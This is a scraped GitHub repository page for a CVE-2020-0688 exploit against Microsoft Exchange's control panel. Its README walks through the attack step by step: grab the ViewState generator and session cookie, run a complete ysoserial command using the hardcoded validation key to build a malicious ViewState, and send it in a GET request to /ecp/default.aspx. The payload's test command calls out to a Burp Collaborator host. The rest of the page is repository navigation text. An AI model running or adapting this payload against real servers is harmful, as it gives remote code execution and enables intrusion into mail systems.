cve-2020-0688

Login with a user with an email address privliage is nothing to worry about.

Grab - __VIEWSTATEGENERATOR from page source Grab - the value of ASP.NET_SessionId cookie for viewstateuserkey value

Download YSO Here

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

GET TO:

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

The Exploit.py is untested and need a demo system to fire up and play with.

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

cve-2020-0688

About

Releases

Packages

Languages

random-robbie/cve-2020-0688

Folders and files

Latest commit

History

Repository files navigation

cve-2020-0688

About

Topics

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages